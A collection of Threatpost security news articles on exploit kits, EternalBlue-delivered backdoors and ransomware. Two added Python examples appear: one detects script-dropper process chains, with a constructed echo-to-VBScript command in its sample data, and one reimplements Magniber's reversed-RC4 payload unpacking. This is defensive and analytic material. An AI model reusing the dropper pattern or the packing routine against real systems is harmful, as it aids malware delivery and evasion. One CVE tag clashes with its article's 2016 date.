“The _POST_ request generated by this page is answered with an HTML page including a JavaScript and a VBScript. These scripts include the URL pointing to the CVEs they are going to exploit,” Unterbrink and Tacheau wrote. After assessing and exploiting a browser’s vulnerability, attackers then attempt to download the final malware.

In one instance observed by Cisco, a JavaScript file exploited a use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 ([CVE-2013-2551](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2551>)). “After exploitation, it generates another JScript file, writes it to disk and executes it via command line,” researchers explain. “This script downloads the encrypted binary stream from the EK website, decodes it, saves it to disk with a random name and finally executes it.”

The executable used was a variant of the Terdot.A/Zloader malware downloader, Cisco said.

Researchers say they have observed similar behavior while monitoring the Sundown exploit kit, which also drops the Zloader malware.
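The two-stage dropper Cisco describes above (a JScript file written to disk, launched from the command line, which then fetches, decodes and runs a randomly named binary) has the same shape as the echo-into-1.vbs / cscript chain in the EternalBlue article further down this page, and both leave a recognisable trail in process-creation telemetry. The following Python is an added example, not Cisco's or FireEye's code, that hunts for those links in a list of process-creation events. The events, pids, paths and file names are constructed for the example, and the field layout is an assumption rather than any real log format.

```python
import re
from dataclasses import dataclass
from typing import Dict, List


# Constructed process-creation events (Sysmon-style fields, simplified);
# the pids, paths and file names are made up for this example.
@dataclass
class Proc:
    pid: int
    ppid: int
    image: str     # full image path of the new process
    cmdline: str   # its command line


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
BROWSERS = {"iexplore.exe", "firefox.exe", "chrome.exe"}
# Directories an exploited browser or a remote shell can write to without admin rights.
USER_WRITABLE = re.compile(r"\\(temp|appdata|users\\[^\\]+\\downloads|programdata)\\", re.I)
# A script-host argument ending in a Windows Script Host extension.
SCRIPT_ARG = re.compile(r'([^\s"]+\.(?:js|jse|vbs|vbe|wsf))\b', re.I)
# "echo ... > something.vbs": a shell building a script on disk one line at a time.
ECHO_TO_SCRIPT = re.compile(r'\becho\b.*>>?\s*"?([^\s"&|]+\.vbs)', re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_script_droppers(events: List[Proc]) -> List[str]:
    """Return one finding per suspicious link in a script-dropper chain.

    events must be in chronological order, as a log export would be.
    """
    by_pid: Dict[int, Proc] = {e.pid: e for e in events}
    echoed_scripts: Dict[str, int] = {}   # script file name -> pid of the cmd.exe that wrote it
    findings: List[str] = []
    for e in events:
        img = basename(e.image)
        parent = by_pid.get(e.ppid)
        parent_img = basename(parent.image) if parent else ""

        # Link A (EternalBlue article): cmd.exe writes a .vbs with echo redirection.
        m = ECHO_TO_SCRIPT.search(e.cmdline)
        if img == "cmd.exe" and m:
            echoed_scripts[basename(m.group(1))] = e.pid

        # Link B: a script host runs a script that was just echoed to disk,
        # or one that a browser launched from a user-writable directory (Terror article).
        if img in SCRIPT_HOSTS:
            sm = SCRIPT_ARG.search(e.cmdline)
            script = sm.group(1) if sm else ""
            if basename(script) in echoed_scripts:
                findings.append(f"pid {e.pid}: {img} runs {basename(script)}, which cmd.exe pid "
                                f"{echoed_scripts[basename(script)]} built with echo")
            elif parent_img in BROWSERS and USER_WRITABLE.search(script):
                findings.append(f"pid {e.pid}: browser {parent_img} (pid {e.ppid}) launched {img} on {script}")

        # Link C: the script host then executes a binary from a user-writable directory.
        if parent_img in SCRIPT_HOSTS and img.endswith(".exe") and USER_WRITABLE.search(e.cmdline):
            findings.append(f"pid {e.pid}: script host pid {e.ppid} executed {img} from a user-writable path")
    return findings


# Constructed sample: an EK-style chain (pids 200-400), an EternalBlue-style
# chain (pids 500-700) and one benign admin script (pid 800).
SAMPLE_EVENTS = [
    Proc(100, 1,   r"C:\Windows\explorer.exe", "explorer.exe"),
    Proc(200, 100, r"C:\Program Files\Internet Explorer\iexplore.exe", '"C:\\Program Files\\Internet Explorer\\iexplore.exe"'),
    Proc(300, 200, r"C:\Windows\System32\wscript.exe", r'wscript.exe "C:\Users\bob\AppData\Local\Temp\a1b2c3.js"'),
    Proc(400, 300, r"C:\Users\bob\AppData\Local\Temp\8fj3k2.exe", r'"C:\Users\bob\AppData\Local\Temp\8fj3k2.exe"'),
    Proc(500, 4,   r"C:\Windows\System32\cmd.exe", r'cmd.exe /c echo Set s=CreateObject("ADODB.Stream") > C:\Windows\Temp\1.vbs'),
    Proc(600, 500, r"C:\Windows\System32\cscript.exe", r"cscript.exe C:\Windows\Temp\1.vbs"),
    Proc(700, 600, r"C:\Windows\Temp\taskmgr.exe", r"C:\Windows\Temp\taskmgr.exe"),
    Proc(800, 100, r"C:\Windows\System32\cscript.exe", r"cscript.exe //nologo C:\Scripts\inventory.vbs"),
]

if __name__ == "__main__":
    for finding in find_script_droppers(SAMPLE_EVENTS):
        print(finding)
```

Run against the sample it reports four links (the browser-launched script, the binary it spawned, the echoed 1.vbs being run, and the binary that script host spawned) and stays silent on the admin script started from Explorer. In production the same three links are what you would pivot on, with the parent/child relationship doing most of the work and the path heuristics only narrowing the noise.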
“Terror EK is known for using exploits used by Sundown, so it seems to be they also use payloads from Sundown,” researchers said.

Source: Threatpost, [Terror Exploit Kit Evolves Into Larger Threat](<https://threatpost.com/terror-exploit-kit-evolves-into-larger-threat/125816/>), published 2017-05-19. CVEs referenced: CVE-2013-2551. CVSS 9.3 (AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE).

### Inside the RIG Exploit Kit

Today’s most prolific exploit kit is RIG, which has filled a void left by the departure of Angler, Neutrino and Nuclear. That has made it public enemy No. 1 when it comes to exploit kits. Now Cisco Talos researchers are hoping to shed new light on the ongoing development of the potent EK in hopes of neutralizing the RIG EK threat.

As with the unraveling of any EK, one of the keys to stopping infection rates is determining infection routes and how adversaries bypass security software and devices.

In a deep analysis of RIG, [the Cisco Talos team recently outlined](<http://blog.talosintel.com/2016/11/rig-exploit-kit-campaign-happy-puzzling.html>) the unique nature of the exploit kit. In a nutshell, like other exploit kits, the crew behind RIG uses gates to redirect victims to the exploit kit. But what makes RIG unique, according to Cisco Talos researchers, is the way RIG combines different web technologies, such as DoSWF, JavaScript, Flash and VBScript, to obfuscate the attack.

Making matters worse, each separate attack strategy utilizes “dynamically changing encoding and encryption for all files transmitted.” Talos’s dissection of RIG also reveals this technique ensures scripts look different every time an attack session is launched.
That churn, Cisco Talos said, “ensures (attackers) can’t be detected by simple string matches or hash values.”

At the heart of the RIG attack, researchers say, is a three-pronged attack strategy that leverages JavaScript-, Flash- or VBScript-based attacks as needed.

With RIG, when it comes to the delivery of malware files, “the same malware file often gets written and executed multiple times on the victim’s PC. If one method doesn’t work or is blocked by an anti-malware solution, they have a couple of backup methods. All stages and methods are obfuscated, some more, some less,” Cisco Talos wrote.

As part of its RIG campaign analysis, Cisco Talos noted that most infections were initiated through compromised websites. “These are websites which were hacked and then the adversaries added malicious code into the website which redirected the user to the gate. The gate then redirects the user to the EK landing page,” according to Holger Unterbrink, the author of the blog.

To a lesser extent, Unterbrink said, other RIG campaigns used gates that relied on malvertising, redirecting traffic to the adversary’s infection chain. Here victims are funneled into a JavaScript-, Flash- or VBScript-based attack. In the end, all of these scripts download and execute the same malware file which the exploit kit wants to install on the victim’s machine.

Stage one of the attack is driving traffic to a compromised website, which starts the redirection chain. The compromised website loads a malicious Flash (SWF) file. Next, that Flash file inserts one or two iframes into the compromised site.
Now, the victim’s browser is redirected via the iframe to the gate.

“The gate – which is nothing else than another web site on another server – does some checks and redirects the user again, but now to the exploit kit landing page – again another web page on another server,” Unterbrink said.

Lastly, the exploit kit landing page includes three JavaScript variables – a JavaScript which loads a Flash (SWF) exploit, a VBScript with an exploit, and a third JavaScript that also contains an exploit. “This is a very complex infection chain with all of these steps using their own obfuscation techniques,” Unterbrink said.

The SWF file is heavily obfuscated by commercial protection software called DoSWF, a professional Flash SWF encryptor. This Flash file itself creates two malicious iframes, according to Talos, that are served up inside the compromised website. One is generated instantly; the other is generated and placed into the compromised website a bit later, after a timer in the first Flash file expires.

Unterbrink says the reason for the timed delay is unclear, but theorizes it could be a backup mechanism in case the first compromise fails.

Next, depending on vulnerabilities in the victim’s browser, either iframe, both filled with JavaScript code, redirects the victim to the RIG exploit kit’s landing page. Here the victim’s browser is faced with three embedded scripts hidden inside corresponding JavaScript variables.

One of the scripts hidden inside the RIG EK landing page is a VBScript.
“After a couple of tests on the target system, (the VBScript) executes the DoMagic() function, which downloads the main malware payload of the campaign, such as ransomware, using the URL stored in the script,” according to Talos.

A second script on the RIG EK landing page inserts random comments such as “/*sw7586sdd*/” between the JavaScript code used, Talos notes. “These comments are changed per session, which means that the Base64 encoded blob looks different in every session,” Talos researchers wrote in a technical write-up outlining their research.

This script then executes another malicious Flash (SWF) file that is once again obfuscated by the [DoSWF](<http://www.doswf.org/>) Flash tool. Talos says it is working on de-obfuscating the code, but for now asserts the code “seems to be a type of shellcode payload which gets decoded at runtime, combined with other strings stored in the SWF, and finally executed by an exploit.”

The remaining JavaScript file in the RIG exploit kit landing page, according to Talos, exploits CVE-2013-2551 (aka MS13-037) to download and infect the victim. MS13-037 addresses an integer overflow vulnerability in Internet Explorer, according to a [Microsoft security bulletin from May 2013](<https://technet.microsoft.com/en-us/library/security/ms13-037.aspx>).

“The vulnerability exists in the handling of the dashstyle.array length for vml shapes on the vgx.dll module.
The exploit has been built and tested specifically against Windows 7 SP1 with Internet Explorer 8,” according to a technical description of MS13-037 by Rapid7.

According to Talos, the MS13-037 exploit includes code that drives the victim to a URL to download the final EK malware.

In the campaigns tracked by Cisco Talos for this report, payloads included ransomware (mainly CRYPTFILE2, but also Locky and CryptXXX), Trojans (Gamarue and Gootkit) and some broken executables, Unterbrink said.

To protect against RIG, Cisco Talos recommends disabling all unnecessary browser plugins. “Patching and updating is mandatory for all browsers and their plugins. Any browser with an unpatched outdated Flash plugin will get infected, it is just a question of time,” Unterbrink said. That time horizon, he said, will be small. “I would guess something from minutes to a few days, depending on your luck and surfing behavior.”

Source: Threatpost, [Inside the RIG Exploit Kit](<https://threatpost.com/inside-the-rig-exploit-kit/121805/>), published 2016-11-04. CVEs referenced: CVE-2013-2551. CVSS 9.3 (AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE).

### Malvertising Campaign Hits AOL Ad Network, Leads to Exploit Kit

Researchers have detected a malvertising campaign running on a pair of sites owned by Huffington Post that is using ads distributed through an AOL ad network. The attack is sending victims through a series of redirects that eventually brings them to a landing page that is running an exploit kit.

The campaign emerged first on huffingtonpost.ca on Dec. 31 and researchers from security firm Cyphort soon found it on the main Huffington Post site in the United States as well.
The researchers discovered that the campaign originates with ads being served by AOL’s Advertising.com network, and once a user clicked on a malicious ad, she was redirected through a number of hops, some using HTTPS, until she hit a landing page. That page contained an exploit kit that was serving both Flash and VBScript exploits.

The landing pages appear to be compromised Polish sites.

“Interestingly attackers used a mix of HTTP and HTTPS redirects to hide the servers involved in this attack. The HTTPS redirector is hosted on a Google App Engine page. This makes analysis based on traffic PCAPs more difficult, because HTTPS traffic is encrypted,” the Cyphort [analysis](<http://www.cyphort.com/huffingtonpost-serving-malware/>) of the attack says. AOL has taken steps to shut down the campaign.

“It appears that this group has compromised and/or has access to multiple .pl domains in Poland, and is making redirects via sub-domains for these sites (nysa.pl, klodzko.pl, etc).”

The malvertising campaign extended to a number of other sites beyond the Huffington Post domains, the researchers said, and the exploit kit used in the attack appears to be the [Neutrino kit](<https://threatpost.com/neverquest-trojan-adds-new-targets-capabilities/108076>). The infection begins with a JavaScript attack and then the code decrypts an HTML file and a VBScript file. The HTML file is loaded in an iframe, the researchers said, and exploits an old vulnerability, the CVE-2013-2551 use-after-free flaw in Internet Explorer. The VBScript then downloads a malicious executable.

“The purpose of this attack is to install a malicious binary – a new variant of a Trojan, from the Kovter family. (SHA1: eec439cb201d12d7befe5482e8a36eeb52206d6f). The malware was downloaded from indus.qgettingrinchwithebooks.babia-gora.pl:8080, it was an un-encrypted binary. After execution it connects to a16-kite.pw for CNC.
It executes through injecting its payload to a spawned svchost.exe process,” the researchers say.

Cyphort’s researchers got in touch with the abuse team at AOL and the attack stopped soon after.

“We have escalated this issue to AOL security team ([advertising.com](<http://advertising.com/>) infection). They are investigating. We have not talked to Huffington Post or dozens of other infected websites, yet. Shortly after we notified AOL, the attack was discontinued,” Nick Bilogorskiy, a Cyphort researcher, said in a statement.

_Image from Flickr photos of [Stuart Rankin](<https://www.flickr.com/photos/24354425@N03/>)._

Source: Threatpost, [Malvertising Campaign Hits AOL Ad Network, Leads to Exploit Kit](<https://threatpost.com/malvertising-campaign-uses-aol-ad-network-leads-to-exploit-kit/110230/>), published 2015-01-06. CVEs referenced: CVE-2013-2551. CVSS 9.3 (AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE).

### EternalBlue Exploit Spreading Gh0st RAT, Nitol

EternalBlue, the exploit used in the [WannaCry ransomware outbreak](<https://threatpost.com/microsoft-releases-xp-patch-for-wannacry-ransomware/125671/>), is now being leveraged to distribute the Nitol backdoor and Gh0st RAT malware.

Security researchers at FireEye said that, just as the WannaCry criminals did, threat actors are leveraging the same Microsoft Server Message Block (SMB) protocol vulnerability ([MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)).

“We observed lab machines vulnerable to the SMB exploit were attacked by a threat actor using the EternalBlue exploit to gain shell access to the machine,” wrote co-authors Ali Islam, Christopher Glyer and Barry Vengerik in a FireEye
[report](<https://www.fireeye.com/blog/threat-research/2017/05/threat-actors-leverage-eternalblue-exploit-to-deliver-non-wannacry-payloads.html>) posted Friday.

Gh0st RAT is a Trojan that has targeted the Windows platform for years. It has [primarily been a nation-state tool](<https://threatpost.com/malware-hunter-crawls-internet-looking-for-rat-c2s/125360/>) used in APT attacks against government agencies, activists and other political targets. Gh0st recently made headlines when instances of the RAT were found by the Shodan tool called [Malware Hunter](<https://malware-hunter.shodan.io/>), a new crawler designed to find command and control servers.

According to FireEye, Backdoor.Nitol has been linked to campaigns involving a remote code execution vulnerability using the ADODB.Stream ActiveX object that affects older versions of Internet Explorer. In the past, Backdoor.Nitol and Gh0st have also been delivered via exploitation of the [CVE-2014-6332](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6332>) vulnerability and in spam campaigns that target PowerShell commands, researchers said.

“The initial exploit technique used at the SMB level (by Backdoor.Nitol and Gh0st) is similar to what we have seen in WannaCry campaigns; however, once a machine is successfully infected, this particular attack opens a shell to write instructions into a VBScript file and then executes it to fetch the payload on another server,” researchers wrote.

Researchers said they have seen the same EternalBlue and VBScript combination used to distribute Gh0st RAT in Singapore and Backdoor.Nitol in the South Asia region.

The analysis of how Backdoor.Nitol and Gh0st exploit Windows follows the pattern of the threat actors behind WannaCry – attackers send specially crafted messages to a Microsoft SMBv1 server.

“The attacker echoes instructions into a new ‘1.vbs’ file to be executed later.
These instructions fetch the payload ‘taskmgr.exe’ from another server in a synchronous call. This action creates an ActiveX object ADODB.Stream, which allows reading the file coming from the server and writes the result of the binary data in a stream,” researchers said.

Ultimately, “the ‘1.vbs’ executes through a command-line version of the Windows Script Host which deletes the vbs file. Once the executable is fetched and saved, the attacker uses a shell to launch the backdoor from the saved location,” researchers said. That fetched executable is the Nitol or Gh0st RAT binary.

“The addition of the EternalBlue exploit to Metasploit has made it easy for threat actors to exploit these vulnerabilities. In the coming weeks and months, we expect to see more attackers leveraging these vulnerabilities and to spread such infections with different payloads,” researchers said.

Source: Threatpost, [EternalBlue Exploit Spreading Gh0st RAT, Nitol](<https://threatpost.com/eternalblue-exploit-spreading-gh0st-rat-nitol/126052/>), published 2017-06-02. CVEs referenced: CVE-2014-6332. CVSS 9.3 (AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE).

### New Magniber Ransomware Targets South Korea, Asia Pacific

Researchers identified a new ransomware family called Magniber that uniquely targets only users in South Korea and the Asia-Pacific region. The ransomware is primarily being distributed by the Magnitude exploit kit, a primary distribution vehicle in the past for Cerber ransomware.

Because of Magniber’s close affiliation with both the Magnitude EK and Cerber, researchers are calling the new ransomware Magniber, a mashup of both names.

“Magnitude EK activity fell off the radar until Oct.
15, 2017, when it came back and began focusing solely on South Korea. Previously it had been distributing Cerber ransomware, but Cerber distribution has declined and now it is distributing ransomware known as Magniber,” wrote FireEye in a report released [Thursday on the new ransomware strain](<https://www.fireeye.com/blog/threat-research/2017/10/magniber-ransomware-infects-only-the-right-people.html>).

Over the past few days other researchers have also spotted similar Magniber activity. Trend Micro noted Magnitude EK activity had vanished briefly two weeks prior to the Oct. 15 Magniber attacks. Researchers there also said that while the ransomware families Cerber, SLocker and Locky were often used in focused attacks, they had never been aimed at specific geographic regions.

As for the malware’s payload, Magniber ransomware will not execute if the system language is not Korean, according to FireEye researchers Muhammad Umair, Zain Gardezi and Shahzad Ahmad, who co-authored the report.

“The malware calls GetSystemDefaultUILanguage, and if the system language is not Korean, it exits,” FireEye said.

Magniber encrypts user data using AES-128, researchers at FireEye said, noting that its Magniber sample differed from that found by other researchers.

“The malware contains a binary payload in its resource section encrypted in reverse using RC4. It starts unpacking it from the end of the buffer to its start. Reverse RC4 decryption keys are 30 bytes long and also contain non-ASCII characters,” researchers said.

After unpacking in memory, the malware starts executing the contents of the payload.
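The two things an analyst has to reproduce to reach the payload FireEye describes are the Korean-only gate and the reversed RC4 unpacking of the resource under a 30-byte key containing non-ASCII bytes. The following Python is an added example, not FireEye's or the malware's code: a plain RC4, a wrapper that runs it over the buffer from its end to its start, the LANGID check, and a constructed key and payload. Which byte order “encrypted in reverse” means exactly is an assumption here (keystream byte 0 applied to the last byte of the buffer); the sample's real key and payload are not on the page.

```python
# Added example (not FireEye's or Magniber's code): RC4 applied to a buffer in
# reverse, the way the article describes Magniber unpacking its resource.

KOREAN_PRIMARY_LANGID = 0x12     # LANG_KOREAN; GetSystemDefaultUILanguage returns a LANGID


def should_run(langid: int) -> bool:
    """Mirror the gate the article describes: run only if the UI language is Korean.
    The primary language is the low 10 bits of a LANGID (0x0412 is ko-KR)."""
    return (langid & 0x3FF) == KOREAN_PRIMARY_LANGID


def rc4(data: bytes, key: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    S = list(range(256))
    j = 0
    for i in range(256):                       # key scheduling
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for b in data:                             # keystream generation + XOR
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def rc4_reverse(data: bytes, key: bytes) -> bytes:
    """RC4 walked from the end of the buffer to its start: keystream byte 0 is
    applied to the last byte. This byte order is an assumption about what
    'encrypted in reverse' means, not taken from the sample."""
    return rc4(data[::-1], key)[::-1]


# Constructed 30-byte key with non-ASCII bytes, matching the key shape described.
SAMPLE_KEY = bytes(range(0xC0, 0xC0 + 30))
# Constructed stand-in for the packed payload (a PE would start with b"MZ").
SAMPLE_PAYLOAD = b"MZ" + bytes(range(2, 64)) + b"constructed payload body"


def pack_resource(payload: bytes, key: bytes = SAMPLE_KEY) -> bytes:
    """What the packer would store in the resource section."""
    return rc4_reverse(payload, key)


def unpack_resource(resource: bytes, key: bytes = SAMPLE_KEY) -> bytes:
    """What the loader (or an analyst's script) does to get the payload back."""
    return rc4_reverse(resource, key)


if __name__ == "__main__":
    res = pack_resource(SAMPLE_PAYLOAD)
    print(unpack_resource(res) == SAMPLE_PAYLOAD)     # True
    print(rc4(res, SAMPLE_KEY) == SAMPLE_PAYLOAD)     # False: forward RC4 does not undo it
```

The forward-RC4 check at the end is the practical lesson: if a resource dumped from a sample refuses to decrypt with the recovered key, try the buffer reversed before assuming the key is wrong. For sandboxing, the LANGID check is why a default en-US analysis VM sees the sample exit cleanly.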
Part of that process includes using a 19-character pseudorandom string to construct four callback URLs, used to identify a virtual machine and avoid executing the ransomware on one.

If the Magniber ransomware is executed, the malware then starts to encrypt user files on the system, renaming them by adding a “.ihsdj” extension to the end. Once it has accomplished this task, the malware issues a command to delete itself.

According to Trend Micro, hackers are using the Magnitude EK in conjunction with malvertising campaigns and exploiting a memory corruption vulnerability ([CVE-2016-0189](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0189>)) in Internet Explorer (9 through 11), patched last year.

“While the current threat landscape suggests a large portion of attacks are coming from emails, exploit kits continue to put users at risk – especially those running old software versions and not using ad blockers,” FireEye researchers noted.

**Source:** Threatpost, [New Magniber Ransomware Targets South Korea, Asia Pacific](<https://threatpost.com/new-magniber-ransomware-targets-south-korea-asia-pacific/128567/>), published 2017-10-21. Tagged CVEs: CVE-2016-0189. CVSS v2: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C).

Gamers may soon be feeling the pain of crypto-ransomware.

A variant of CryptoLocker is in the wild that goes after data files associated with 20 different online games, locking downloadable content in an attempt to target younger computer users.

Researchers at Bromium today said an unnamed compromised website is serving the malware. Victims are redirected by a Flash exploit to a site hosting the Angler exploit kit, and Angler drops the CryptoLocker variant.

“The website is based on WordPress and could have been compromised by any one of the numerous WP exploits,” wrote Vadim Kotov in an [advisory](<http://labs.bromium.com/2015/03/12/achievement-locked-new-crypto-ransomware-pwns-video-gamers/>) for Bromium. “Additionally, the URL where the malicious Flash file is hosted keeps changing.”

Kotov said the attackers forgo typical iframe redirects and instead use a Flash file wrapped in an invisible div tag, likely in an attempt to evade detection. The malware proceeds through a number of checks for the presence of virtual machines or antivirus before dropping a Flash exploit for CVE-2015-0311 or an Internet Explorer exploit for CVE-2013-2551.

The malware behaves like a typical CryptoLocker infection, presenting the victim with a banner explaining that files have been encrypted and that a ransom must be paid in Bitcoin in order for a decryption key to be sent to the victim. There are also instructions to make payments over Tor if the decryption site is not working.

More than 50 file extensions associated with video games are targeted by this variant, in addition to images, documents, iTunes files and more. A number of popular single-player games including Call of Duty, Minecraft, Half Life 2, Elder Scrolls, Skyrim, Assassin’s Creed and others are affected, as are online games such as World of Warcraft, Day Z and League of Legends, as well as a number of EA Sports, Valve and Bethesda games. Steam gaming software is also in the crosshairs, Bromium said.

“Encrypting all these games demonstrates the evolution of crypto-ransomware as cybercriminals target new niches. Many young adults may not have any crucial documents or source code on their machine (even photographs are usually stored at Tumblr or Facebook), but surely most of them have a Steam account with a few games and an iTunes account full of music,” Kotov wrote. “Non-gamers are also likely to be frustrated by these attacks if they lose their personal data.”

Some of the files the variant goes after are often impossible to restore; those include user profile data, saved games, in-game maps and mods, Kotov wrote.

The Bromium advisory goes into more detail about command and control communication and encryption mechanisms. The experts advise gamers to back up their files on an external hard drive that is not connected to the Internet.

“As more file categories are infected, a broader audience is affected,” Kotov said. “The attackers are also getting better at incorporating BitCoin code directly into their projects, which isn’t a good sign.”

**Source:** Threatpost, [CryptoLocker Variant Coming After Gamers](<https://threatpost.com/cryptolocker-variant-coming-after-gamers/111611/>), published 2015-03-12 (modified 2015-04-13). Tagged CVEs: CVE-2013-2551, CVE-2015-0311. CVSS v2: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C).

A new sort of hacktivism emerged last week when experts from Trustwave published new research revealing that attackers are using the Angler exploit kit and the Bedep Trojan in order to drive artificial views to politically controversial videos.

The motivation for the scheme, it appears, is to inflate the popularity of certain opinions by increasing the number of views reported by videos boasting those ideas.
More specifically, the attackers are seeking to display these videos more prominently on the video aggregation site Daily Motion. The use of botnets to artificially increase the number of views associated with a certain video is nothing new. However, Trustwave said this is the first time it has observed the tactic exploited in such a political fashion.

[Trustwave’s Rami Kogan says](<https://www.trustwave.com/Resources/SpiderLabs-Blog/Bedep-trojan-malware-spread-by-the-Angler-exploit-kit-gets-political/>) he first observed the malware promoting pro-Russian content related to the Russo-Ukrainian conflict, defending a recent state-sponsored trip to Norway, and announcing militant deaths in the North Caucasus. Outside politics, Kogan believes that a similar but largely unrelated campaign is being used to inflate views for other videos on Daily Motion as well, including one announcing that U.S. actress and singer Anna Kendrick is writing a book and another debating which tech giant has the best headquarters. In both cases, attackers are simultaneously using Bedep to drive traffic to, and increase revenue from, online advertisements.

The attack begins with an infection driven by [the notorious and preeminent Angler exploit kit](<https://threatpost.com/analyzing-angler-the-worlds-most-sophisticated-exploit-kit/110904>). The attackers are using a malicious iframe to redirect victims from a compromised tourism site. Angler then looks for evidence of installed antivirus software and for developer tools frequently used by security researchers in order [to avoid detection and analysis](<https://threatpost.com/domain-shadowing-latest-angler-exploit-kit-evasion-technique/111396>). If it finds no defensive mechanisms in place, the kit installs the Bedep Trojan onto its victims’ machines.

In this case, Kogan observed Angler exploiting CVE-2014-6332, an OleAut32.dll vulnerability, and CVE-2015-0313, an Adobe Flash Player vulnerability.

Once Bedep is loaded, the malware’s command and control server drives the user to a specially crafted site that is overloaded with ad content in an attempt to increase the efficiency of the campaign’s click-fraud efforts. Meanwhile, videos are loaded in a hidden desktop without the user’s knowledge, promoting the scam’s other mission: to increase the number of views for a given video in order to have it more prominently displayed on DailyMotion.

Strangely, once the click-fraud and view-inflation goals are achieved, the attackers seem to hand their victims off to other criminals by re-infecting their machines with either the Magnitude or Neutrino exploit kits.

“It seems that the guys behind this particular C&C are trying to maximize their profit by selling traffic from compromised computers to other campaigners that seek to spread their own malware via Magnitude and Neutrino,” Kogan writes. “Just to make it clear: An already infected computer is visiting ads silently without the user’s consent, and gets re-infected over and over again.”

Oddly, all of the pro-Russian videos claim to have garnered right around 320,000 views. The clips also have no “shares” on Facebook, “retweets” on Twitter or comments. Each has a graph embedded illustrating views from the last 24 hours.

**Source:** Threatpost, [Angler Exploit Kit, Bedep Malware Inflating Video Views](<https://threatpost.com/angler-exploit-kit-bedep-malware-inflating-video-views/112611/>), published 2015-05-05 (modified 2015-05-06). Tagged CVEs: CVE-2014-6332, CVE-2015-0313. CVSS v2: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C).

Attackers behind the Neutrino Exploit Kit didn’t take long to co-opt a recently patched Internet Explorer zero-day into its arsenal.

Researchers claim the kit has been pushing CVE-2016-0189, a vulnerability that was reportedly used in targeted attacks on South Korean organizations earlier this year. Microsoft fixed the vulnerability, which affects Internet Explorer’s scripting engines, [in May](<https://threatpost.com/microsoft-patches-jscript-vbscript-flaw-under-attack/117993/>).

Four researchers with FireEye, Kenneth Johnson, Sai Omkar Vashisht, Yasir Khalid, and Dan Caselden, [explained Thursday](<https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html>) how attackers managed to leverage published source code for the exploit.

The researchers claim that the criminals behind Neutrino must have noticed when Theori, an Austin-based cybersecurity R&D startup, [developed a proof-of-concept exploit around the vulnerability in June](<http://theori.io/research/cve-2016-0189>).

> Researchers at Theori published an analysis of Internet Explorer 11 VBScript Memory Corruption (with PoC exploit) <https://t.co/N6KsQbE30o>
>
> — Theori (@theori_io) [June 23, 2016](<https://twitter.com/theori_io/status/745781927131545601>)

Researchers with Theori deconstructed the vulnerability following
Microsoft’s Patch Tuesday release that month and were able to compare the original to the patched programs, identify the root cause of the vulnerability and devise a [proof-of-concept](<https://github.com/theori-io/cve-2016-0189>) around it.

FireEye researchers claim the exploit in Neutrino is exactly the same as the exploit that Theori came up with, suggesting the attackers simply borrowed the firm’s PoC.

The bug can be exploited when a lock isn’t put on an array before it’s worked on, something that can lead to an issue – and eventually memory corruption – if the array is accessed when another function is in the middle of working on it. The vulnerability can also be exploited to achieve remote code execution, assuming a victim using IE lands on a site hosting the exploit.

The Neutrino kit works by embedding several exploits – including CVE-2016-0189 – into a Shockwave (.SWF) file that, once run, scans the system in order to see which vulnerability to exploit.

The researcher Kafeine, who blogs at [Malware Don’t Need Coffee](<http://malware.dontneedcoffee.com/2016/07/cve-2016-0189-internet-explorer-and.html>), discussed earlier this week how he’d seen the CVE integrated into Neutrino, even posting a screenshot of the kit, dropping Locky, complete with its list of exploits.

In recent months a handful of malvertising and ransomware campaigns have pivoted towards kits like RIG and Neutrino [in the wake of dying, if not already dead kits](<https://threatpost.com/nuclear-angler-exploit-kit-activity-has-disappeared/118842/>) like Angler and Nuclear. In a report last month Proofpoint said that Neutrino dropping CryptXXX accounted for 75 percent of its observed exploit kit traffic, while another 10 percent combined of Neutrino and Magnitude was dropping Cerber. While they were successful for a long stretch of time, activity from Nuclear and Angler has been basically non-existent since the end of April and the beginning of June, respectively, Kafeine told Threatpost last month.

**Source:** Threatpost, [Neutrino EK Spotted Leveraging Patched IE Zero Day](<https://threatpost.com/patched-ie-zero-day-incorporated-into-neutrino-ek/119321/>), published 2016-07-15. Tagged CVEs: CVE-2016-0189, CVE-2017-11882. CVSS v2: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C).

A busy Microsoft Patch Tuesday arrived today with an extra sense of urgency and a complication.

Among 14 bulletins, four of which are rated critical by Microsoft, is a patch for the [OLE zero-day vulnerability](<http://threatpost.com/attackers-exploiting-windows-ole-zero-day-vulnerability/108958>) being used in a number of targeted attacks. The zero-day is being spread via email messages containing malicious Office file attachments. The disclosure, the second against OLE since Oct. 14, was partially addressed when Microsoft issued a [FixIt tool](<https://support.microsoft.com/kb/3010060>) as a temporary mitigation.

The OLE vulnerability affected all supported releases of Windows and allowed attackers to remotely control infected computers and execute code.
The announcement followed a report by iSIGHT Partners revealing that the [Sandworm APT group](<https://threatpost.com/sandworm-apt-team-found-using-windows-zero-day-vulnerability/108815>) was exploiting another hole in OLE to attack government agencies and energy utilities.

OLE, or Microsoft Windows Object Linking and Embedding, allows for embedding and linking to documents and other objects.

